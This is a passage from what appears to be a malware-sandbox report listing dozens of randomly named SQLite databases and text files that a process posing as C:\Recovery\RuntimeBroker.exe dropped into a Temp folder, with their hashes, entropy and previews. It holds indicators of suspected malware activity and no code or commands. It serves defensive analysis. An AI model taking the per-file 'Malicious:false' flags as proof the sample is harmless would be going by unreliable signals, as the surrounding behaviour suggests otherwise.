                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\uQCfFd22UK

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\ubfkiJt6LQ

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):25
                                                                                                            Entropy (8bit):4.293660689688185
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:GUKcmNVIE3ZH3:GHH3
                                                                                                            MD5:8082DB3577BA2847DB9EC3326E3644CF
                                                                                                            SHA1:E8F9440D61B6B4035432083F71B642C3A5932954
                                                                                                            SHA-256:08FEC9B1274EC7468EB6308A8A25D022625AF80D02EC3163F0EA1090CF849D2E
                                                                                                            SHA-512:BEDA4DBE6E1FA530FF87FE6AEBB05E5CA9222D3AB7B30760EB9A3D36BB8651F81582C926CA6F3DF608C427423791D0B2F05685A95F70F25CA3CBC2D4195E16F7
                                                                                                            Malicious:false
                                                                                                            Preview:XBY1olwCh0UC6Ona2JZeYDUUR

                                                                                                            C:\Users\user\AppData\Local\Temp\ufodWiTSVv

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\v2N51Kr038

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\v4e0V37w1Q

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\vGT0DkupIv

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\vSKoJJeClk

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\viTsSlpiAP

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\vt1Yp1hUPy

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\w5P9tOjZ4B

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\wBKrMkWpSW

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\wCqCShYlA3

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\wJrs676cGE

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\wS8s3Jrqss

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\wh2P4K4Z2X

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\x4CHYsKl6f

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\xGSXT3yJyg

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\xieclsHeHM

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\xumrD4OgFL

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\y18wv6eVUf

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\yMlQKmJeAg

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\z5V3SsHN2H

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\z9yAZmHtJM

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
